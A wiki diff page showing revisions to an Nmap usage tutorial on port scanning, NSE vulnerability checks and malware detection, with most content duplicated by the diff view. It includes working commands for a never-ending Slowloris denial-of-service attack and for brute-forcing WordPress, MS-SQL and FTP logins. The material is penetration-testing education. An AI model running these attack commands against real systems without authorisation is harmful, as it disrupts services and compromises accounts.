Wiki

Nmap:Penggunaan: Difference between revisions

← Older edit
Kangtain (talk | contribs)
Bureaucrats, Interface administrators, Suppressors, Administrators
9,154 edits
VisualWikitext
 
Line 148: Line 148:
One of the things we love most about Nmap is the fact that it works for both TCP and UDP protocols. And while most services run on TCP, you can also get a great advantage by scanning UDP-based services. Let’s see some examples.
One of the things we love most about Nmap is the fact that it works for both TCP and UDP protocols. And while most services run on TCP, you can also get a great advantage by scanning UDP-based services. Let’s see some examples.


Standard TCP scanning output:
Standard TCP scanning output:<syntaxhighlight lang="shell">
[root@securitytrails:~]nmap -sT 192.168.1.1
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
Nmap scan report for 192.168.1.1
Host is up (0.58s latency).
Not shown: 995 closed ports


[root@securitytrails:~]nmap -sT 192.168.1.1
PORT       STATE SERVICE
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
80/tcp     open   http
Nmap scan report for 192.168.1.1
1900/tcp   open   upnp
Host is up (0.58s latency).
20005/tcp open   btx
Not shown: 995 closed ports
49152/tcp open   unknown
PORT STATE SERVICE
49153/tcp open   unknown
80/tcp open http
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds


UDP scanning results using <code>-sU</code> parameter:
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
</syntaxhighlight>UDP scanning results using <code>-sU</code> parameter:<syntaxhighlight lang="shell">
[root@securitytrails:~]nmap -sU localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000021s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports


[root@securitytrails:~]nmap -sU localhost
PORT     STATE         SERVICE
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
68/udp   open|filtered dhcpc
Nmap scan report for localhost (127.0.0.1)
111/udp   open           rpcbind
Host is up (0.000021s latency).
5353/udp open|filtered zeroconf
Other addresses for localhost (not scanned): ::1
</syntaxhighlight>
Not shown: 997 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind
5353/udp open|filtered zeroconf


===13. CVE detection using Nmap===
===13. CVE detection using Nmap===
One of Nmap’s greatest features that not all the network and systems administrators know about is something called “Nmap Scripting Engine” (known as NSE). This scripting engine allows users to use a pre-defined set of scripts, or write their own using Lua programming language.
One of Nmap’s greatest features that not all the network and systems administrators know about is something called “Nmap Scripting Engine” (known as NSE). This scripting engine allows users to use a pre-defined set of scripts, or write their own using Lua programming language.


Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:
Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:<syntaxhighlight lang="shell">
nmap -Pn --script vuln 192.168.1.105
nmap -Pn --script vuln 192.168.1.105
 
</syntaxhighlight>Output example:<syntaxhighlight lang="shell">
Output example:
[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
Pre-scan script results:
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
| broadcast-avahi-dos:
Pre-scan script results:
| Discovered hosts:
| broadcast-avahi-dos:
| 224.0.0.251
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
| 224.0.0.251
|_ Hosts are all up (not vulnerable).
| After NULL UDP avahi packet DoS (CVE-2011-1002).
Nmap scan report for 192.168.1.105
|_ Hosts are all up (not vulnerable).
Host is up (0.00032s latency).
Nmap scan report for 192.168.1.105
Not shown: 995 closed ports
Host is up (0.00032s latency).
PORT STATE SERVICE
Not shown: 995 closed ports
80/tcp open http
PORT STATE SERVICE
|_http-csrf: Couldn't find any CSRF vulnerabilities.
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|_http-dombased-xss: Couldn't find any DOM based XSS.
| VULNERABLE:
| http-slowloris-check:
| Slowloris DOS attack
| VULNERABLE:
| State: LIKELY VULNERABLE
| Slowloris DOS attack
| IDs: CVE:CVE-2007-6750
| State: LIKELY VULNERABLE
| Slowloris tries to keep many connections to the target web server open and hold
| IDs: CVE:CVE-2007-6750
| them open as long as possible. It accomplishes this by opening connections to
| Slowloris tries to keep many connections to the target web server open and hold
| the target web server and sending a partial request. By doing so, it starves
| them open as long as possible. It accomplishes this by opening connections to
| the http server's resources causing Denial Of Service.
| the target web server and sending a partial request. By doing so, it starves
|
| the http server's resources causing Denial Of Service.
| Disclosure date: 2009-09-17
|
| References:
| Disclosure date: 2009-09-17
| http://ha.ckers.org/slowloris/
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1900/tcp open upnp
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
20005/tcp open btx
1900/tcp open upnp
49152/tcp open unknown
20005/tcp open btx
49153/tcp open unknown
49152/tcp open unknown
</syntaxhighlight>As you can see, in this vulnerability test we were able to detect one CVE (Slowloris DOS attack).
49153/tcp open unknown
 
As you can see, in this vulnerability test we were able to detect one CVE (Slowloris DOS attack).


===14. Launching DOS with Nmap===
===14. Launching DOS with Nmap===
Nmap features never seem to end, and thanks to the NSE, that even allows us to launch DOS attacks against our network testings.
Nmap features never seem to end, and thanks to the NSE, that even allows us to launch DOS attacks against our network testings.


In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop:
In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop:<syntaxhighlight lang="shell">
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
</syntaxhighlight>


===15. Launching brute force attacks===
===15. Launching brute force attacks===
NSE is really fascinating – it contains scripts for everything you can imagine. See the next three examples of BFA against WordPress, MSSQL, and FTP server:
NSE is really fascinating – it contains scripts for everything you can imagine. See the next three examples of BFA against WordPress, MSSQL, and FTP server:


WordPress brute force attack:
WordPress brute force attack:<syntaxhighlight lang="shell">
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
 
</syntaxhighlight>Brute force attack against MS-SQL:<syntaxhighlight lang="shell">
Brute force attack against MS-SQL:
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
</syntaxhighlight>FTP brute force attack:<syntaxhighlight lang="shell">
 
nmap --script ftp-brute -p 21 192.168.1.105
FTP brute force attack:
</syntaxhighlight>
nmap --script ftp-brute -p 21 192.168.1.105


===16. Detecting malware infections on remote hosts===
===16. Detecting malware infections on remote hosts===
Nmap is able to detect malware and backdoors by running extensive tests on a few popular OS services like on Identd, Proftpd, Vsftpd, IRC, SMB, and SMTP. It also has a module to check for popular malware signs inside remote servers and integrates Google’s Safe Browsing and VirusTotal databases as well.
Nmap is able to detect malware and backdoors by running extensive tests on a few popular OS services like on Identd, Proftpd, Vsftpd, IRC, SMB, and SMTP. It also has a module to check for popular malware signs inside remote servers and integrates Google’s Safe Browsing and VirusTotal databases as well.


A common malware scan can be performed by using:
A common malware scan can be performed by using:<syntaxhighlight lang="shell">
nmap -sV --script=http-malware-host 192.168.1.105
nmap -sV --script=http-malware-host 192.168.1.105
 
</syntaxhighlight>Or using Google’s Malware check:<syntaxhighlight lang="shell">
Or using Google’s Malware check:
nmap -p80 --script http-google-malware infectedsite.com
nmap -p80 --script http-google-malware infectedsite.com
</syntaxhighlight><syntaxhighlight lang="shell">
 
80/tcp open http
80/tcp open http
|_http-google-malware.nse: Host is known for distributing malware.
|_http-google-malware.nse: Host is known for distributing malware.
</syntaxhighlight>Nmap is one of the most complete and accurate port scanners used by infosec professionals today. With it, you can perform simple port scan tasks or use its powerful scripting engine to launch DOS attacks, detect malware or brute force testings on remote and local servers.
 
Nmap is one of the most complete and accurate port scanners used by infosec professionals today. With it, you can perform simple port scan tasks or use its powerful scripting engine to launch DOS attacks, detect malware or brute force testings on remote and local servers.


Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy.
Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy.
Line 258: Line 254:
{{Note|The articles, tutorial and demo provided on Hackers Terminal is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.}}
{{Note|The articles, tutorial and demo provided on Hackers Terminal is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.}}


 
== Terkait ==
==Terkait==
*[[Nmap]]
*[[Nmap]]


Retrieved from "https://kangtain.com/wiki/index.php/Nmap:Penggunaan"